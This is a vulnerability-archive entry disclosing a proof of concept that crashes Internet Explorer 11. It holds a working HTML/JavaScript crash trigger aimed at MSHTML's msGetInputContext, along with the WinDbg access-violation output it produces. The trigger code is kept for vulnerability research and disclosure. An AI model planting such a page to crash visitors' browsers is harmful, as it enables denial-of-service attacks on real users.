Microsoft Internet Explorer 11 Crash PoC

2015.06.09
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- # Exploit title: Microsoft Internet Explorer 11 Crash PoC # Date: 07.06.2015 # Vulnerable version: 11 (newest at the time 11.0.9600.17801) # Tested on: Windows 7/8.1 # Author: Pawel Wylecial # http://howl.overflow.pl @h0wlu --> <html> <head> <meta http-equiv="Cache-Control" content="no-cache"/> <script> function boom() { var divA = document.createElement("div"); document.body.appendChild(divA); try { //divA.contentEditable = "true"; divA.outerHTML = "AAAA"; var context = divA['msGetInputContext'](); } catch (exception) { } } </script> </head> <body onload='boom();'> </body> </html> <!-- (2534.480c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98 eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 MSHTML!Tree::ElementNode::GetCElement: 5f302e86 f7410800001000 test dword ptr [ecx+8],100000h ds:002b:00000008=???????? -->

References:

http://howl.overflow.pl


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top